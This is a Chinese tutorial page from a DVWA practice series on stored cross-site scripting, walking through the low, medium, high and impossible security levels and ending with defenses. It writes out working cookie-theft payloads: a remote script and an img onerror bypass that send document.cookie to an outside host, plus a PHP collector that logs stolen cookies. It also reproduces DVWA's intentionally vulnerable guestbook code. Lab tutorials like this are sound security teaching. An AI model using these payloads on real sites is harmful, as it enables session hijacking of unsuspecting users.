技术教程 编程教程 DVWA 黑客攻防演练(十一) 存储型 XSS 攻击 Stored Cross Site Scripting 正文

DVWA 黑客攻防演练(十一) 存储型 XSS 攻击 Stored Cross Site Scripting

2023-03-12,,

上一篇文章会介绍了反射型 XSS 攻击。本文主要是通过 dvwa 介绍存储型 XSS 攻击。存储型 XSS 攻击影响范围极大。比如是微博、贴吧之类的,若有注入漏洞,再假如攻击者能用上一篇文章类似的代码获取用户的 cookies,想想如果代码中再加入自动转发功能,每个看过那条微博的用户都会被偷 cookies 和自动转发!像网络病毒一样的传播速度啊!恐怖如斯!

低级

功能很简单。点击提交就会有相应的文字。 此时,Hacker 在里面输入 <script>alert(1)</script>

也就是有注入漏洞了。于是 Hacker 再输入了 <script src="//www.a.com/test.js"></script>

//test.js

var img = document.createElement("img")

img.src = "http://www.a.com/?cookies="+escape(document.cookie);

document.body.appendChild(img);

然后所有看到这条信息的用户的 cookies 就会被偷走了。 而低级的代码是这样的,没有做任何的防护

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {

    // Get input

    $message = trim( $_POST[ 'mtxMessage' ] );

    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input

    $message = stripslashes( $message );

    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input

    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database

    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";

    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();

}

?>

中级

中级代码,会意识到这个问题 所以会对 message 进行处理

addslashes 每个引号前添加反斜杠(" -> \")
strip_tags 去掉 HTML 的标签 (Hello -> Hello)
mysql_real_escape_string 函数,对",',\r等特殊符号转义
htmlspecialchars ,对 html 相关的字符转义,防止浏览器将其用作 HTML 元素,比如>转成 &gt;

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {

    // Get input

    $message = trim( $_POST[ 'mtxMessage' ] );

    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input

    $message = strip_tags( addslashes( $message ) );

    $message = mysql_real_escape_string( $message );

    $message = htmlspecialchars( $message );

    // Sanitize name input

    $name = str_replace( '<script>', '', $name );

    $name = mysql_real_escape_string( $name );

    // Update database

    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";

    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    //mysql_close();

}

?>

然而百密一疏,name 字段只有去掉 script 字符串 和用mysql_real_escape_string函数进行转义

所有可以利用 name 字段注入

Hacker 输入在 Name 字段输入 前端那里有个字符长度的限制。你可以用火狐直接将 maxlength 改大,或者用 brupSuite 的改就可以了。 所以这代码最后还是可以被注入的。

高级

高级代码 对 name 的验证有所改变。

<?php

  //...

  // Sanitize name input

  $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

  $name = mysql_real_escape_string( $name );

  //...

?>

如果看过上一篇文章,应该会了解。这样的代码可以用 img 等元素绕过的。 <img src=x onerror="e=escape;this.src='//www.a.com?cookies='+e(document.cookie)"> 要改下 www.a.com/index.php 因为原本只是记录 cookies 到文件中,不返回图片的。这段注入代码执行后会不断地发请求的。所以改成返回一张图片就可以了。比如

<?php

$name = 'gakki.jpg';

$fp = fopen($name, 'rb');

header("Content-Type: image/png");

header("Content-Length: " . filesize($name));

fpassthru($fp);

$c = $_GET["cookies"];

echo $c;

error_log($c ."". "\n",3,"/var/log/a/cookies");

?>

结果如下

沉迷我老婆美色的时候,cookie 就被偷走了

不可能

不可能级别有

anti-token 机制防 CSRF 攻击
使用 db->prepare  预编译,绑定参数的方式,防 SQL 攻击
name 和 message 参数通过 htmlspecialchars 等函数防御

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {

    // Check Anti-CSRF token

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input

    $message = trim( $_POST[ 'mtxMessage' ] );

    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input

    $message = stripslashes( $message );

    $message = mysql_real_escape_string( $message );

    $message = htmlspecialchars( $message );

    // Sanitize name input

    $name = stripslashes( $name );

    $name = mysql_real_escape_string( $name );

    $name = htmlspecialchars( $name );

    // Update database

    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );

    $data->bindParam( ':message', $message, PDO::PARAM_STR );

    $data->bindParam( ':name', $name, PDO::PARAM_STR );

    $data->execute();

}

// Generate Anti-CSRF token

generateSessionToken();

?>

防御 XSS 攻击

下面是防御 XSS 攻击的措施

参数校验,比如中高级的如果 name 参数后端也判断了长度不能超过 10。 攻击者注入的难度的增大很多了。比如百度网盘这个案例
后端可以使用 HttpOnly 的方式,之前的攻击手段基本会用 document.cookies 就能获取当前网页的 cookie 了。 比如这样

<?php

    header("Set-Cookie: cookie1=test1");

    header("Set-Cookie: cookie2=test2;httponly",false)

?>

<script>

    alert(document.cookie);

</script>

只会把 cookie1=test1 弹窗。就算有漏洞也可以减少损失

输出的检查,比如 php 中 htmlspecialchars 函数。

DVWA 黑客攻防演练(十一) 存储型 XSS 攻击 Stored Cross Site Scripting的相关教程结束。

《DVWA 黑客攻防演练(十一) 存储型 XSS 攻击 Stored Cross Site Scripting.doc》

下载本文的Word格式文档,以方便收藏与打印。

Copyright 2023. 昆居客 - IT编程,互联网信息技术文档大全!